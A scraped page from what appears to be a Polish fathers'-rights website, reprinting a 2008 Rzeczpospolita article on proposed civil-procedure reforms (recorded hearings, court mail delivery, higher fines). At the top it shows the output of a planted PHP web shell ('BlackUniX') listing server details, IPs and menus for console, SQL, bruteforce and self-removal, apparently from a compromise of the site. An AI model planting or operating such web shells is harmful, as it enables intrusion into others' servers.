W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:15:41
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Procesy cywilne będą sprawniejsze
28.08.2008.
Nagrywanie rozpraw, zerwanie z monopolem poczty na doręczanie pism sądowych, wyższe kary dyscyplinujące uczestników procesu – takie nowości w procedurze cywilnej proponuje rząd. Komisja Kodyfikacyjna Prawa Cywilnego Ministerstwa Sprawiedliwości przygotowała nowelę kodeksu postępowania cywilnego. Propozycje nie są tak radykalne jak te z czasów ministra Ziobry, ich zaletą jest to, że popiera je obecny rząd, mają więc szansę na uchwalenie przez parlament.
Co ma się zmienić

Jeżeli przebieg rozprawy będzie utrwalany za pomocą urządzeń elektronicznych (na razie są to jednak tylko plany), to uczestnicy postępowania mają prawo otrzymywać kopie zapisu. Dla sędziego Marcina Łochowskiego, rzecznika Sądu Okręgowego Warszawa-Praga, to najważniejsza propozycja. Nie wszyscy sędziowie są jej entuzjastami. – Zapisy takie zdyscyplinują uczestników rozprawy, w tym sędziów. Powinno się skończyć nierzadkie kwestionowanie wierności protokołów, zarzuty, że sędzia coś ukrywa itp. Ma to także skrócić rozprawy – uważa sędzia.

Inna ważna zmiana, niestety, nie do wprowadzenia od ręki, to rozszerzenie katalogu podmiotów, przez które sąd może dokonywać doręczeń tzw. poczty sądowej. Jest to, jak wiadomo, pięta achillesowa sądownictwa. Doręczać będzie można nie tylko przez woźnych, których w sądach zresztą właściwie nie ma, ale przez każdego tam zatrudnionego oraz firmy zajmujące się dostarczaniem korespondencji. Zniknie więc także monopol Poczty Polskiej w tym zakresie. Przy okazji precyzuje się, że odmowa przyjęcia pisma sądowego przez adresata jest równoznaczna z doręczeniem.

Od ręki można zaś wprowadzić obowiązek wymieniania się przez adwokatów (i radców) pismami procesowymi – jak to już jest w sprawach gospodarczych. Projekt zakłada rozszerzenie kompetencji referendarzy i możliwości dokonywania czynności przez sąd na posiedzeniu niejawnym, a także stanowi, że ogłoszenie wyroku można odroczyć tylko raz (do dwóch tygodni).

Zupełną nowością jest propozycja, by kuratora dla osoby prawnej (spółki, spółdzielni), która nie może prowadzić swoich spraw z braku władz, ustanawiał nie sąd rodzinny, jak teraz, ale bardziej do tego predysponowany sąd rejestrowy.

Dwa podobne projekty

Z dyscyplinujących proces pomysłów PiS zostawiono zaostrzenie dopuszczalnej grzywny za niestosowanie się do rygorów procedury przez uczestników procesu (świadków, ale też adwokatów) z 1000 zł do 20 000.

W Sejmie jest bowiem już od grudnia przygotowany przez poprzedni rząd projekt znacznie obszerniejszej nowelizacji kodeksu postępowania cywilnego (prace przerwało skrócenie kadencji), który w tej kadencji złożyli posłowie PiS jako inicjatywę poselską.

– 80 proc. pomysłów wzięto z naszego projektu, który od grudnia leży w Sejmie, a powinien być rozpatrywany niezwłocznie. Nie są to polityczne pomysły, nieważne więc, kto jest ich autorem, ale to, czy są dobre, czy nie – powiedział “Rz” poseł Andrzej Dera, wnioskodawca projektu PiS.Sędzia Robert Zegadło, sekretarz Komisji Kodyfikacyjnej, nie kryje, że znaczna część pomysłów, ale tylko ta “rozsądniejsza”, pochodzi z tamtej noweli. Uzasadnienia obu projektów zaczynają się zresztą identycznie: celem jest uproszczenie i usprawnienie procesu cywilnego, a w efekcie skrócenie czasu rozpoznawania spraw.
Żródło: Marek Domagalski Rzeczypospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.